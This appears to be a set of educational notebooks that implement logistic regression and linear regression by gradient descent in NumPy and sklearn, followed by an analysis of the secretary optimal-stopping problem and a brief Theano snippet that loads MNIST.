<h3 style="text-align: center;"><b>Implementing Binomial Logistic Regression</b></h3>
<h5 style="text-align: center;">This notebook follows this wonderful tutorial by Nikhil Kumar: <a href="https://www.geeksforgeeks.org/understanding-logistic-regression/" target="_blank">https://www.geeksforgeeks.org/understanding-logistic-regression/</a><br></h5>
<h4 style="text-align: center;"><b>Note: most of the description, code, and text is copied from the GeeksforGeeks explanation, mostly because it is explained very well.</b></h4>
<h4 style="text-align: center;"><b>To be honest, I would recommend just following the GeeksforGeeks tutorial; this notebook doesn't add much to that wonderful tutorial.</b></h4>
<h5 style="text-align: center;">Logistic regression is a supervised classification algorithm. In a classification problem, the target variable (or output), y, can take only discrete values for a given set of features (or inputs), X.<br><br>Contrary to popular belief, logistic regression IS a regression model: it builds a regression model to predict the probability that a given data entry belongs to the category numbered "1". Just as linear regression assumes that the data follow a linear function, logistic regression models the data using the sigmoid function.</h5>
$$ g(z) = \frac{1}{1 + e^{-z}} $$
<h5 style="text-align: center;">Logistic regression becomes a classification technique only when a decision threshold is brought into the picture. The setting of the threshold value is a very important aspect of logistic regression and depends on the classification problem itself.<br>The choice of threshold value is mainly driven by the values of precision and recall. Ideally, we want both precision and recall to be 1, but this is seldom the case. In a precision-recall tradeoff, we use the following arguments to decide upon the threshold:<ol><li>Low Precision/High Recall: In applications where we want to reduce the number of false negatives without necessarily reducing the number of false positives, we choose a decision value with a low value of precision or a high value of recall. For example, in a cancer diagnosis application, we do not want any affected patient to be classified as not affected, without giving much heed to whether a patient is wrongfully diagnosed with cancer. This is because the absence of cancer can be detected by further medical examination, but the presence of the disease cannot be detected in an already rejected candidate.</li><li>High Precision/Low Recall: In applications where we want to reduce the number of false positives without necessarily reducing the number of false negatives, we choose a decision value with a high value of precision or a low value of recall. For example, if we are classifying whether customers will react positively or negatively to a personalised advertisement, we want to be absolutely sure that a customer will react positively to the advertisement, because otherwise a negative reaction can cause a loss of potential sales from the customer.</li></ol></h5>
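To make the trade-off concrete, here is a minimal sketch (with made-up labels and scores, not from any dataset in this notebook) showing how lowering the threshold raises recall at the expense of precision:

```python
import numpy as np

# Hypothetical true labels and predicted probabilities
y_true = np.array([0, 0, 1, 1, 1, 0, 1, 0])
p_hat = np.array([0.2, 0.4, 0.8, 0.6, 0.3, 0.5, 0.9, 0.1])

def precision_recall(threshold):
    y_pred = (p_hat >= threshold).astype(int)
    tp = np.sum((y_pred == 1) & (y_true == 1))
    fp = np.sum((y_pred == 1) & (y_true == 0))
    fn = np.sum((y_pred == 0) & (y_true == 1))
    return tp / (tp + fp), tp / (tp + fn)

print(precision_recall(0.3))  # low threshold: recall 1.0, precision ~0.67
print(precision_recall(0.7))  # high threshold: precision 1.0, recall 0.5
```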
<h5 style="text-align: center;">Based on the number of categories, Logistic regression can be classified as:<ol><li>binomial: target variable can have only 2 possible types: “0” or “1” which may represent “win” vs “loss”, “pass” vs “fail”, “dead” vs “alive”, etc.</li><li>multinomial: target variable can have 3 or more possible types which are not ordered(i.e. types have no quantitative significance) like “disease A” vs “disease B” vs “disease C”.</li><li>ordinal: it deals with target variables with ordered categories. For example, a test score can be categorized as:“very poor”, “poor”, “good”, “very good”. Here, each category can be given a score like 0, 1, 2, 3.</li></ol></h5>
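As a quick illustration of the first two variants (a sketch assuming scikit-learn is available; ordinal regression needs a dedicated package and is not shown), scikit-learn's `LogisticRegression` handles both binary and multinomial targets with the same API:

```python
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression

X, y = load_iris(return_X_y=True)  # 3 unordered classes -> multinomial
clf = LogisticRegression(max_iter=1000).fit(X, y)
print(clf.predict_proba(X[:2]).shape)  # (2, 3): one probability per class
```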
<h5 style="text-align: center;">Let the data be an n x (p+1) matrix, where n is the number of observations and p is the number of feature variables (a leading column of ones is included for the intercept)</h5>
$$ X = \begin{bmatrix} 1 & x_{1,1} & \ldots & x_{1,p} \\ 1 & x_{2,1} & \ldots & x_{2,p} \\ \vdots & \vdots & \ddots & \vdots \\ 1 & x_{n,1} & \ldots & x_{n,p} \end{bmatrix} $$
$$ x_i = \begin{bmatrix} 1 \\ x_{i,1} \\ x_{i,2} \\ \vdots \\ x_{i,p} \end{bmatrix} $$
$$ \text{Then } h(x_i) = \beta_0 + \beta_1x_{i,1} + \beta_2x_{i,2} + \ldots + \beta_px_{i,p}$$
$$ \text{Or can be } h(x_i) = \beta^Tx_i $$
$$ \text{The reason for taking } x_0 = 1 \text{ is now clear: we needed a matrix product, but there was no actual } x_0 \text{ multiplying } \beta_0 \text{ in the original hypothesis formula, so we defined } x_0 = 1. $$
$$ \text{So } h(x_i) = g(\beta^Tx_i) = \frac{1}{1 + e^{-\beta^Tx_i}} $$
<h5 style="text-align: center;">From the equation, g(z) tends towards 1 as z -> ∞ and towards 0 as z -> -∞. Thus it is always bounded between 0 and 1.</h5>
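A quick numeric check of these bounds (a small sketch, not part of the original tutorial):

```python
import numpy as np

def g(z):
    # sigmoid: strictly increasing, bounded in (0, 1)
    return 1.0 / (1.0 + np.exp(-z))

z = np.array([-10.0, -1.0, 0.0, 1.0, 10.0])
print(g(z))  # strictly increasing, all values inside (0, 1), with g(0) = 0.5
```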
$$ \text{So, for the 2 labels (0 and 1), for the } i^{th} \text{ observation:} $$
$$ P(y_i = 1|x_i;\beta) = h(x_i) $$
$$ P(y_i = 0|x_i;\beta) = 1 - h(x_i) $$
$$ \text{Or: } P(y_i|x_i;\beta) = (h(x_i))^{y_i}(1 - h(x_i))^{1 - y_i}$$
$$ \text{We also need the likelihood, which is nothing but the probability of the data (training examples) given a model and specific parameter values (here, }\beta \text{). It measures the support provided by the data for each possible value of } \beta \text{. We obtain it by multiplying all } P(y_i|x_i) \text{ for a given }\beta $$
$$ L(\beta) = \prod_{i=1}^{n} P(y_i|x_i;\beta) \text{ or } $$
$$ L(\beta) = \prod_{i=1}^{n} (h(x_i))^{y_i}(1 - h(x_i))^{1 - y_i} $$
$$ \text{For easier calculation we take the (natural) log-likelihood, matching np.log in the code: } l(\beta) = \log(L(\beta)) \text{ or }$$
$$ l(\beta) = \sum_{i=1}^{n}y_i\log(h(x_i)) + (1 - y_i)\log(1 - h(x_i)) $$
$$ \text{Cost Function: } J(\beta) = \sum_{i=1}^{n}-y_i\log(h(x_i)) - (1 - y_i)\log(1 - h(x_i)) $$
<h5 style="text-align: center;">Using Gradient Descent</h5>
$$ \frac{\partial J(\beta)}{\partial \beta_j} = \sum_{i=1}^{n}(h(x_i) - y_i)x_{i,j} $$
```
"""
All code is from https://www.geeksforgeeks.org/understanding-logistic-regression/ by Nikhil Kumar
"""
import csv
import numpy as np
import matplotlib.pyplot as plt


def loadCSV(filename):
    '''
    function to load dataset
    '''
    with open(filename, "r") as csvfile:
        lines = csv.reader(csvfile)
        dataset = list(lines)
    for i in range(len(dataset)):
        dataset[i] = [float(x) for x in dataset[i]]
    return np.array(dataset)


def normalize(X):
    '''
    function to normalize feature matrix, X
    '''
    mins = np.min(X, axis=0)
    maxs = np.max(X, axis=0)
    rng = maxs - mins
    norm_X = 1 - ((maxs - X) / rng)
    return norm_X


def logistic_func(beta, X):
    '''
    logistic (sigmoid) function
    '''
    return 1.0 / (1 + np.exp(-np.dot(X, beta.T)))


def log_gradient(beta, X, y):
    '''
    logistic gradient function
    '''
    return np.dot((logistic_func(beta, X) - y.reshape(X.shape[0], -1)).T, X)


def cost_func(beta, X, y):
    '''
    cost function, J
    '''
    y = np.squeeze(y)
    final = -(y * np.log(logistic_func(beta, X))) - ((1 - y) * np.log(1 - logistic_func(beta, X)))
    return np.mean(final)


def grad_desc(X, y, beta, lr=.01, converge_change=.001):
    '''
    gradient descent function
    '''
    cost = cost_func(beta, X, y)
    change_cost = 1
    num_iter = 1
    while change_cost > converge_change:
        old_cost = cost
        beta -= lr * log_gradient(beta, X, y)
        cost = cost_func(beta, X, y)
        change_cost = old_cost - cost
        num_iter += 1
    return beta, num_iter


def pred_values(beta, X):
    '''
    function to predict labels
    '''
    pred_prob = logistic_func(beta, X)
    pred_value = np.where(pred_prob >= .5, 1, 0)
    return np.squeeze(pred_value)


def plot_reg(X, y, beta):
    '''
    function to plot decision boundary
    '''
    # labelled observations
    x_0 = X[np.where(y == 0.0)]
    x_1 = X[np.where(y == 1.0)]
    # plotting points with diff color for diff label
    plt.scatter([x_0[:, 1]], [x_0[:, 2]], c='b', label='y = 0')
    plt.scatter([x_1[:, 1]], [x_1[:, 2]], c='r', label='y = 1')
    # plotting decision boundary
    x1 = np.arange(0, 1, 0.1)
    x2 = -(beta[0, 0] + beta[0, 1] * x1) / beta[0, 2]
    plt.plot(x1, x2, c='k', label='reg line')
    plt.xlabel('x1')
    plt.ylabel('x2')
    plt.legend()
    plt.show()


if __name__ == '__main__':
    dataset = loadCSV('Data\\binary_data.csv')
    # normalizing feature matrix
    X = normalize(dataset[:, :-1])
    # stacking a column of all ones onto the feature matrix
    X = np.hstack((np.matrix(np.ones(X.shape[0])).T, X))
    # response vector
    y = dataset[:, -1]
    # initial beta values
    beta = np.matrix(np.zeros(X.shape[1]))
    # beta values after running gradient descent
    beta, num_iter = grad_desc(X, y, beta)
    # estimated beta values and number of iterations
    print("Estimated regression coefficients:", beta)
    print("No. of iterations:", num_iter)
    # predicted labels
    y_pred = pred_values(beta, X)
    # number of correctly predicted labels
    print("Correctly predicted labels:", np.sum(y == y_pred))
    # plotting regression line
    plot_reg(X, y, beta)

from sklearn.linear_model import LogisticRegression

dataset = loadCSV('Data\\binary_data.csv')
X = normalize(dataset[:, :-1])
y = dataset[:, -1]
clf = LogisticRegression(random_state=0).fit(X, y)
print(clf.predict(X[:2, :]))
print(clf.predict_proba(X[:2, :]))
print(clf.score(X, y))
```
<h5 style="text-align: center;">Note: Gradient descent is only one of many ways to estimate β. There are more advanced algorithms that can easily be run in Python once you have defined your cost function and your gradients:<ul><li>BFGS (Broyden–Fletcher–Goldfarb–Shanno algorithm)</li><li>L-BFGS (like BFGS, but uses limited memory)</li><li>Conjugate Gradient</li></ul></h5>
<h5 style="text-align: center;">Advantages/disadvantages of using any one of these algorithms over Gradient descent:</h5><h5 style="text-align: center;"><br>Advantages:<br><ul><li>Don’t need to pick learning rate</li><li>Often run faster (not always the case)</li><li>Can numerically approximate gradient for you (doesn’t always work out well)</li></ul><br>Disadvantages:<ul><li>More complex</li><li>More of a black box unless you learn the specifics</li></ul></h5>
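As a sketch of how one of these optimizers can replace a hand-written gradient-descent loop (using SciPy's `minimize` with L-BFGS, on a small synthetic dataset invented here for illustration; `beta_true` is made up):

```python
import numpy as np
from scipy.optimize import minimize

rng = np.random.default_rng(0)
X = np.hstack([np.ones((200, 1)), rng.normal(size=(200, 2))])  # intercept column + 2 features
beta_true = np.array([0.5, 2.0, -1.0])
y = (rng.random(200) < 1.0 / (1.0 + np.exp(-X @ beta_true))).astype(float)

def cost(beta):
    # negative log-likelihood, written with log1p for numerical stability
    z = X @ beta
    return np.mean(y * np.log1p(np.exp(-z)) + (1 - y) * np.log1p(np.exp(z)))

def grad(beta):
    h = 1.0 / (1.0 + np.exp(-(X @ beta)))
    return X.T @ (h - y) / len(y)

res = minimize(cost, np.zeros(3), jac=grad, method='L-BFGS-B')
print(res.x)  # estimated coefficients; no learning rate needed
```

Note how the optimizer only needs the cost and gradient functions; it picks its own step sizes.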
```
"""
This part is from https://www.geeksforgeeks.org/ml-logistic-regression-using-python/
"""
from sklearn.model_selection import train_test_split
xtrain, xtest, ytrain, ytest = train_test_split(
    X, y, test_size=0.25, random_state=0)

from sklearn.preprocessing import StandardScaler
sc_x = StandardScaler()
xtrain = sc_x.fit_transform(xtrain)
xtest = sc_x.transform(xtest)

from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state=0)
classifier.fit(xtrain, ytrain)
y_pred = classifier.predict(xtest)

from sklearn.metrics import confusion_matrix
cm = confusion_matrix(ytest, y_pred)
print("Confusion Matrix : \n", cm)

from sklearn.metrics import accuracy_score
print("Accuracy : ", accuracy_score(ytest, y_pred))

from matplotlib.colors import ListedColormap
X_set, y_set = xtest, ytest
X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 1,
                               stop=X_set[:, 0].max() + 1, step=0.01),
                     np.arange(start=X_set[:, 1].min() - 1,
                               stop=X_set[:, 1].max() + 1, step=0.01))
plt.contourf(X1, X2, classifier.predict(
    np.array([X1.ravel(), X2.ravel()]).T).reshape(
    X1.shape), alpha=0.75, cmap=ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
    plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
                c=ListedColormap(('red', 'green'))(i), label=j)
plt.title('Classifier (Test set)')
plt.legend()
plt.show()
```
## This notebook will be focused on using gradient descent to solve simple linear regression and multivariate regression problems
Note: This notebook is for educational purposes as using normal equations would be a superior approach to solving the optimization problem for the datasets that I use in this notebook.
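For reference, the "normal equations" approach mentioned above solves for the coefficients in closed form, β = (XᵀX)⁻¹Xᵀy; here is a minimal sketch on a tiny made-up dataset (using `lstsq`, the numerically safer way to evaluate the same solution):

```python
import numpy as np

# Tiny made-up dataset lying exactly on y = 1 + 2x
X = np.column_stack([np.ones(4), np.array([1.0, 2.0, 3.0, 4.0])])  # intercept column + feature
y = np.array([3.0, 5.0, 7.0, 9.0])

beta, *_ = np.linalg.lstsq(X, y, rcond=None)
print(beta)  # [1. 2.]: intercept and slope recovered without any iteration
```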
```
import numpy as np
from sklearn.linear_model import LinearRegression # Used for validation
from sklearn import datasets
import random
import matplotlib.pyplot as plt
import pandas as pd
import latex
%matplotlib inline
import warnings
warnings.filterwarnings('ignore')
import time
from sklearn.metrics import mean_squared_error
```
### Initially this notebook will be focused on simple linear regression
```
# Will be using the diabetes dataset with a single predictor.
diabetes = datasets.load_diabetes()
X = diabetes.data[:, np.newaxis, 2]
y = diabetes.target
# Using sklearn's linear regression to determine the ideal output of my implementation
lr = LinearRegression()
lr.fit(X, y)
predictedVals = lr.predict(X)
print("R^2: " + str(lr.score(X, y)))
print("Coefs: " + str(lr.coef_))
print("Intercept: " + str(lr.intercept_))
# Mean squared error to compare to in the future
mean_squared_error(y, predictedVals)
plt.scatter(X, y)
plt.plot(X, predictedVals, color="black")
plt.title("Diabetes Linear Regression")
plt.xlabel("predictor")
plt.ylabel("y value")
plt.show()
```
### In order to implement gradient descent, we must have a cost function which incorporates the weight and bias terms
I will be comparing a numpy-based implementation with a for-loop implementation to see if there is any significant difference in how long the functions take to run. The numpy implementation is over 10x faster.
- N: number of observations, (mx<sub>i</sub> + b) is the prediction
$$MSE = \frac{1}{N}\sum_{i=1}^{n}(y_i - (mx_i + b))^2 $$
```
# Ensuring the shapes of the arrays are correct
# Note: if y is of the wrong shape, it messes up future equations which don't rely on for loops
y0 = y.shape[0]
x0 = X.shape[0]
y.shape = (y0, 1)
X.shape = (x0, 1)


# Cost function with numpy
def get_cost(X, y, weight, bias):
    total_error = np.average((y - (X * weight + bias)) ** 2)
    # total_error = np.mean((y-(weight*X+bias))**2)
    return total_error


# Cost function with a for loop
def cost_function(X, y, weight, bias):
    total = len(X)
    total_error = 0.0
    for i in range(total):
        total_error += (y[i] - (weight * X[i] + bias)) ** 2
    return total_error / total


# Testing the cost function implementation with random terms
weight = 3.1245
weight_arr = np.array([weight])
weight_arr.shape = (1, 1)
bias = 0.0134
bias_arr = np.array(bias)
bias_arr.shape = (1, 1)

# time.clock() was removed in Python 3.8; perf_counter() is the replacement
start = time.perf_counter()
parallel_cost = get_cost(X, y, weight_arr, bias_arr)
how_long = time.perf_counter() - start
print("Took: ", how_long)
parallel_cost

start = time.perf_counter()
normal_cost = cost_function(X, y, weight, bias)
how_long1 = time.perf_counter() - start
print("Took: ", how_long1)
normal_cost
```
### Creating functions to update the weights and bias terms using gradient descent
Yet again, I will be comparing two implementations of an update_weight function, one using numpy and the other using a for loop to determine if there is a difference in performance. Within the update_weight for loop function, I will also be using the for loop implementation of mse.
$$ f(m,b) = \frac{1}{N}\sum_{i=1}^{n}(y_i-(mx_i+b))^2$$
$$ f^\prime(m,b) = \begin{split} & \frac{df}{dm} = \bigg[\frac{1}{N}\sum-2x_i(y_i-(mx_i+b))\bigg]
\\ & \frac{df}{db} = \bigg[\frac{1}{N}\sum-2(y_i-(mx_i+b))\bigg] \end{split} $$
```
# Updating the weights, without any normalization or optimization, using numpy
def update_weights(X, y, weight, bias, lr=0.01):
    df_dm = (1 / len(X)) * np.dot((-2 * X).T, (y - (weight * X + bias)))
    df_db = np.average(-2 * (y - (weight * X + bias)))
    weight = weight - (lr * df_dm)
    bias = bias - (lr * df_db)
    return weight, bias


def get_new_weights(X, y, weight, bias, learning_rate=0.01):
    weight_deriv = 0
    bias_deriv = 0
    total = len(X)
    for i in range(total):
        # -2x(y - (mx + b))
        weight_deriv += -2 * X[i] * (y[i] - (weight * X[i] + bias))
        # -2(y - (mx + b))
        bias_deriv += -2 * (y[i] - (weight * X[i] + bias))
    weight -= (weight_deriv / total) * learning_rate
    bias -= (bias_deriv / total) * learning_rate
    return weight, bias


# Parameters set for parameter update function testing
# The numpy implementation was around 3x faster
weight = 10.2345
bias = 6.245

start = time.perf_counter()
weight1, bias1 = update_weights(X, y, weight, bias)
took = time.perf_counter() - start
print("Using Numpy: ")
print("Weight: {}, Bias: {}".format(weight1, bias1))
print("Took: ", took)

start = time.perf_counter()
weight2, bias2 = get_new_weights(X, y, weight, bias)
took = time.perf_counter() - start
print("Using For Loop: ")
print("Weight: {}, Bias: {}".format(weight2, bias2))
print("Took: ", took)
```
### Creating an optimization loop which will update the bias and weight parameters
I will be writing two training functions, one using the update_weight function that utilizes numpy and another that uses a simple for loop to update bias and weight terms. The numpy implementation is over 100x faster.
```
# Initializing weight and bias terms
Weight = 0
Bias = 0


# Training using the numpy update_weights function
def train_numpy(X, y, weight, bias, iters, lr=0.01):
    cost = []
    for i in range(iters):
        weight, bias = update_weights(X, y, weight, bias, lr)
        a_cost = get_cost(X, y, weight, bias)
        cost.append(a_cost)
    return cost, weight, bias


# Training using the for loop update_weights function
def train_for(X, y, weight, bias, iters, lr=0.01):
    cost = []
    for i in range(iters):
        weight, bias = get_new_weights(X, y, weight, bias, lr)
        a_cost = cost_function(X, y, weight, bias)
        cost.append(a_cost)
    return cost, weight, bias


# Not using the for loop made optimization much faster
now_time = time.perf_counter()
numpy_cost, numpy_weight, numpy_bias = train_numpy(X, y, Weight, Bias, 7000, 0.1)
took = time.perf_counter() - now_time
print("Took: ", took)
print("Weight: {}, Bias: {}".format(numpy_weight, numpy_bias))
print("End cost: ", numpy_cost[-1])

now_time = time.perf_counter()
for_cost, for_weight, for_bias = train_for(X, y, Weight, Bias, 7000, 0.1)
took = time.perf_counter() - now_time
print("Took: ", took)
print("Weight: {}, Bias: {}".format(for_weight, for_bias))
print("End cost: ", for_cost[-1])

# For plotting cost against time
time_seq = [i for i in range(7000)]

# Although both implementations have a similar end cost, the numpy implementation was over 100x faster
plt.figure(figsize=(22, 7))
plt.subplot(1, 2, 1)
plt.plot(time_seq, numpy_cost)
plt.title("Cost vs Time Using Numpy")
plt.xlabel("Step Number")
plt.ylabel("Cost")
plt.subplot(1, 2, 2)
plt.plot(time_seq, for_cost)
plt.title("Cost vs Time Using For Loop")
plt.xlabel("Step Number")
plt.ylabel("Cost")
plt.tight_layout()
plt.show()
```
### Now getting the predictions to determine if my model matches the performance of the sklearn linear regression model
Overall, the final cost of my simple linear regression model closely matches that of the sklearn model, so I believe my implementation is just as effective.
$$ Prediction = (mx_i + b) $$
```
X_list = list(X)


def get_predictions(X, weight, bias):
    predictions = []
    for i in range(len(X)):
        pred = X[i] * weight + bias
        predictions.append(pred)
    return predictions


predictions = get_predictions(X_list, numpy_weight, numpy_bias)
predictions_arr = np.array(predictions)
# Ensuring predictions is the right shape
predictions_arr.shape = (442, 1)

plt.scatter(X, y)
plt.plot(X, predictions_arr, color="black")
plt.title("Diabetes Linear Regression")
plt.xlabel("predictor")
plt.ylabel("y value")
plt.show()
```
## The next section of this notebook will be focused on multivariate linear regression
Similar principles as earlier will be applied to this section of the notebook. Note that given the speed boost we saw earlier from using numpy and matrix algebra, all my new functions will be implementing these concepts.
```
# Getting a training set with multiple predictor variables
X2 = diabetes.data[:, np.newaxis, 2:5]
# Ensuring that the new X data is of the correct shape
X2.shape = (442, 3)

# Getting a value to compare our model to
lr = LinearRegression()
lr.fit(X2, y)
predictedVals = lr.predict(X2)
print("R^2: " + str(lr.score(X2, y)))
print("Coefs: " + str(lr.coef_))
print("Intercept: " + str(lr.intercept_))
# Mean squared error to compare to in the future
mean_squared_error(y, predictedVals)

# Setting the new weights for multivariate regression
weight2 = np.array([[0],
                    [0],
                    [0]])  # corresponding with the three variables
bias2 = 0
# Ensuring shapes are correct
assert weight2.shape == (3, 1)
assert X2.shape == (442, 3)
assert y.shape == (442, 1)
```
### Cost function for multivariate regression
$$ MSE = \frac{1}{2N}\sum_{i=1}^{n} (y_i - ((W_1x_1 + W_2x_2 + W_3x_3)+b))^2 $$
$$ \begin{split} & f^\prime(W_1) = -x_1(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \\
& f^\prime(W_2) = -x_2(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \\
& f^\prime(W_3) = -x_3(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \\
& f^\prime(Bias) = -(y-(W_1x_1 + W_2x_2 + W_3x_3+b)) \end{split} $$
```
# Multivariate cost function with numpy
def get_multi_cost(X, y, weight, bias):
    total_error = (1 / 2) * np.average((y - (np.dot(X, weight) + bias)) ** 2)
    return total_error


# Testing the cost function
acost = get_multi_cost(X2, y, weight2, bias2)
acost


def update_multi_weights(X, y, weight, bias, lr=0.01):
    """
    weight: shape (3,1)
    X: shape (442,3)
    y: shape (442,1)
    output: shape (3,1)
    """
    df_dm = (1 / len(X)) * np.dot((-X.T), (y - (np.dot(X, weight) + bias)))
    df_db = np.average(-(y - (np.dot(X, weight) + bias)))
    weight = weight - (lr * df_dm)
    bias = bias - (lr * df_db)
    return weight, bias


weight2, bias2 = update_multi_weights(X2, y, weight2, bias2)
assert weight2.shape == (3, 1)
weight2


# Training loop for multivariate regression
def train_multi(X, y, weight, bias, iters, lr=0.01):
    cost = []
    for i in range(iters):
        weight, bias = update_multi_weights(X, y, weight, bias, lr)
        a_cost = get_multi_cost(X, y, weight, bias)
        cost.append(a_cost)
    return cost, weight, bias


multi_weight = np.array([[0], [0], [0]])
multi_bias = 0
assert multi_weight.shape == (3, 1)
cost, multi_weight, multi_bias = train_multi(X2, y, multi_weight, multi_bias, 17000, 0.1)

time_multi = [i for i in range(17000)]
plt.plot(time_multi, cost)
plt.title("Cost vs Time for Multivariate Regression")
plt.xlabel("Step Number")
plt.ylabel("Cost")
plt.show()

# These two cost values should be very similar
print("Final cost:", cost[-1] * 2)  # note - multiplied by 2 b/c my cost has an additional 1/2 factor
print("Should be around:", mean_squared_error(y, predictedVals))

# This is compared to [[780.74563174 393.19527108 52.90387802]]
multi_weight
# This is compared to [152.13348416]
multi_bias
```
### Finally, I will normalize my input data to see if it affects my cost in any way
$$ x_i = \frac{x_i - mean(X)}{max(X)-min(X)} $$
```
def normalize(X):
    # note: rebinding the loop variable would not modify X,
    # so write back into each column view in place
    X = X.copy()
    for feat in X.T:
        mean = np.mean(feat)
        rang = np.max(feat) - np.min(feat)
        feat[:] = (feat - mean) / rang
    return X


# Getting the cost from using normalized data to see if there is any improvement
X2_norm = normalize(X2)
multi_bias = 0
multi_weight = np.array([[0], [0], [0]])
cost, multi_weight, multi_bias = train_multi(X2_norm, y, multi_weight, multi_bias, 17000, 0.1)
# There is an insignificant difference from the normalization
print("Final cost:", cost[-1] * 2)
```
```
import numpy as np
import matplotlib.pyplot as plt
```
## Optimal Stopping Problem - [Secretary Problem](https://en.wikipedia.org/wiki/Secretary_problem)
- An administrator wants to hire the best secretary out of n rankable applicants.
+ The applicants are interviewed one by one
+ Decision (hire/reject) must be made immediately after each interview.
+ Once rejected, an applicant cannot be recalled
- During the interview, the administrator can rank the applicants among all applicants interviewed so far, but is unaware of the quality of yet unseen applicants
- Optimal Stopping - find a strategy that maximizes the probability of selecting the best applicant
## Solution
#### Observations
- Trade-off between sampling and exploiting
- If the sample size is small -> not enough info
- If the sample size is large -> lots of info, but many potential candidates are wasted
```
Sampling Exploiting
Candidates = x x x x x x o o o o o o o o o o o o o
```
#### Strategy
- n candidates
+ Sampling: sample size = r
+ Interview the first (r-1) candidates and reject them all
+ Suppose X is the best candidate among the first (r-1)
+ Exploiting
+ Interview the rest; if a candidate i better than X is found -> hire
+ If no candidate is better than X -> don't hire; X was the global optimal candidate
- Find r to maximize the chance of hiring the best candidate
$$
\begin{align*}
P(r) &= \sum_{i=1}^{n}P(\text{applicant i is selected} \cap \text{applicant i is the best}) \\
&= \sum_{i=1}^{n}P(\text{applicant i is selected | applicant i is the best})*P(\text{applicant i is the best}) \\
&= \Bigg[\sum_{i=1}^{r-1}0+\sum_{i=r}^{n}P(\text{the best of the first i-1 applicants is in the first r-1 applicants | applicant i is the best})\Bigg]*\frac{1}{n} \\
&= \Bigg[\sum_{i=r}^{n}\frac{r-1}{i-1}\Bigg]*\frac{1}{n} \\
&= \frac{r-1}{n}\sum_{i=r}^{n}\frac{1}{i-1}
\end{align*}
$$
- If n is small, the optimal value of r can be calculated directly from the formula above:
| n | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
|:----:|:---:|:---:|:-----:|:-----:|-------|-------|-------|-------|
| r | 1 | 2 | 2 | 3 | 3 | 3 | 4 | 4 |
| P(r) | 0.5 | 0.5 | 0.458 | 0.433 | 0.428 | 0.414 | 0.410 | 0.406 |
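The table can be reproduced directly from the formula above (a small sketch; the r = 1 case is the degenerate "hire the first applicant" strategy, whose success probability is 1/n):

```python
def P(r, n):
    # success probability when the first r-1 applicants are rejected
    if r == 1:
        return 1.0 / n
    return (r - 1) / n * sum(1.0 / (i - 1) for i in range(r, n + 1))

for n in range(2, 10):
    best_r = max(range(1, n + 1), key=lambda r: P(r, n))
    print(n, best_r, round(P(best_r, n), 3))  # matches the table row by row
```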
- If n -> inf, let x = r/n; then
$$P(x)=x\int_x^1\frac{1}{t}dt=-x\ln(x)$$
- P(x) is maximized at x = 1/e, where P(1/e) = 1/e ~ 0.368
- Optimal sampling size
```
r = n/e
```
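A quick Monte Carlo check of the 1/e law (a sketch with an arbitrary seed; it rejects the first round(n/e) candidates and hires the first later candidate who beats them all):

```python
import numpy as np

def success_rate(n, trials=20000, seed=0):
    rng = np.random.default_rng(seed)
    r = int(round(n / np.e))  # sample size to reject
    wins = 0
    for _ in range(trials):
        ranks = rng.permutation(n)  # candidate ranks; n-1 is the best
        best_sampled = ranks[:r].max()
        # hire the first candidate after the sample who beats the sampled best
        hired = next((v for v in ranks[r:] if v > best_sampled), None)
        wins += (hired == n - 1)
    return wins / trials

print(success_rate(100))  # close to 1/e ~ 0.368
```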
```
# 1/e law of Optimal Strategy
def find_secrectary(candidates):
    '''
    Input: A list of candidates
    Output:
        sample_size: n/e ~ 36.8% of candidates
        idx_sample: index of the best candidate in the sample set
        idx_hired: index of the hired candidate (-1 if no one can be hired)
    '''
    N = len(candidates)
    sample_size = (N / np.exp(1)).round().astype(int)
    # Find the best candidate in the sample set
    idx_sample = 0
    for i in range(sample_size):
        if candidates[i] > candidates[idx_sample]:
            idx_sample = i
    # Hire the first remaining candidate at least as good as the sampled best
    for i in range(sample_size, N):
        if candidates[i] >= candidates[idx_sample]:
            return sample_size, idx_sample, i
    # Can't choose an optimal candidate
    return sample_size, idx_sample, -1
```
## Test
```
def generate_test_set(n, a=30, b=100):
    '''Generate n candidates
    with normally distributed scores in range [a,b]
    '''
    # Generate a normally distributed test set
    mu, sigma = a + (b - a) / 2, (b - a) / 8
    candidates = np.random.normal(mu, sigma, n).round().astype(int)
    # Shuffle the dataset
    np.random.shuffle(candidates)
    # Plot histogram
    count, bins, ignored = plt.hist(candidates, 100, density=True)
    plt.plot(
        bins,
        1 / (sigma * np.sqrt(2 * np.pi)) * np.exp(-(bins - mu) ** 2 / (2 * sigma ** 2)),
        linewidth=2, color='r')
    plt.show()
    return candidates


def test(n, isPrintList=True):
    # Hire the optimal secretary
    candidates = generate_test_set(n, 40, 100)
    sample_size, idx_sample, idx_hired = find_secrectary(candidates)
    # Find the global optimum
    idx_globals = []
    global_optimal = candidates.max()
    for i in range(n):
        if candidates[i] == global_optimal:
            idx_globals.append(i)
    # Print the list of candidates
    if isPrintList:
        print("List of candidates:")
        print('\t', end='')
        for i, candidate in enumerate(candidates):
            print("[{}]{}".format(i, candidate), end=' ')
        print('')
    # Sampling
    print("Sample candidates from [0] to [{}]".format(sample_size - 1))
    print("Best rejected sample candidate: [{}]{}".format(idx_sample, candidates[idx_sample]))
    # Make the hiring decision
    if idx_hired == -1:
        print("Can't hire")
    else:
        print("Hired candidate: [{}]{}".format(idx_hired, candidates[idx_hired]))
    # Globally optimal candidates
    print("Global optimal candidates:", end=' ')
    for idx in idx_globals:
        print("[{}]{}".format(idx, candidates[idx]), end=' ')


test(10)
test(10)
test(20)
test(20)
test(100)
test(100)
test(1000, False)
test(1000, False)
test(int(1e6), False)
test(int(1e6), False)
```
```
# cPickle is Python 2 only; the standard pickle module works on Python 3
import pickle, gzip, numpy
with gzip.open('mnist.pkl.gz', 'rb') as f:
    train_set, valid_set, test_set = pickle.load(f, encoding='latin1')
import theano.tensor as T
import numpy as np
import theano
def shared_dataset(data_xy):
data_x,data_y=data_xy
shared_x=theano.shared(np.array(data_x,dtype=theano.config.floatX))
shared_y=theano.shared(np.array(data_y,dtype=theano.config.floatX))
return shared_x,T.cast(shared_y,'int32')
